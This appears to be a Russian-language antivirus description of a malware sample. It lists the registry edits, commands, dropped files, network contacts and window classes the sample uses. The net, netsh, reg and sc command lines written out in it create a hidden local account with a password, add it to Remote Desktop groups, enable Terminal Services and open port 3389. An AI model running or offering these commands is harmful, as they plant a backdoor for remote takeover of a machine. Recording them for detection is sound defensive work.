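Техническая информация
Записи ниже описывают действия образца: включение автозапуска службы TermService и разрешение подключений к серверу терминалов, создание локальной учётной записи и добавление её в локальные группы, открытие порта TCP 3389 в брандмауэре, а также создаваемые файлы, сетевые обращения и искомые окна. Часть значений замаскирована («#» в именах узлов и адресах); «%USERNAME%s» в имени группы, вероятно, тоже результат автоматической подстановки, а не исходный текст команды.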
- [<HKLM>\SYSTEM\ControlSet001\Services\TermService] 'Start' = '00000002'
- <SYSTEM32>\net1.exe user ASP.net iPhone!@# /add
- <SYSTEM32>\netsh.exe firewall add portopening TCP 3389 "Remote Desktop"
- <SYSTEM32>\net1.exe localgroup "Remote Desktop Users" ASP.net /add
- <SYSTEM32>\net1.exe localgroup %USERNAME%s ASP.net /add
- <SYSTEM32>\reg.exe add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
- <SYSTEM32>\reg.exe add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
- <SYSTEM32>\net1.exe start TermService
- <SYSTEM32>\sc.exe config TermService start= auto
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\69I9OPW5\movies[1].php
- %TEMP%\~1.bat
- %TEMP%\~1.bat
- %TEMP%\~1.bat
- 'www.ro####bowers.com':80
- 'localhost':1036
- www.ro####bowers.com/movies.php
- DNS ASK www.ro####bowers.com
- '10.#.1.1':1037
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebcheckMonitor' WindowName: ''
- ClassName: 'IEFrame' WindowName: ''
- ClassName: '' WindowName: ''
- ClassName: 'Shell_TrayWnd' WindowName: ''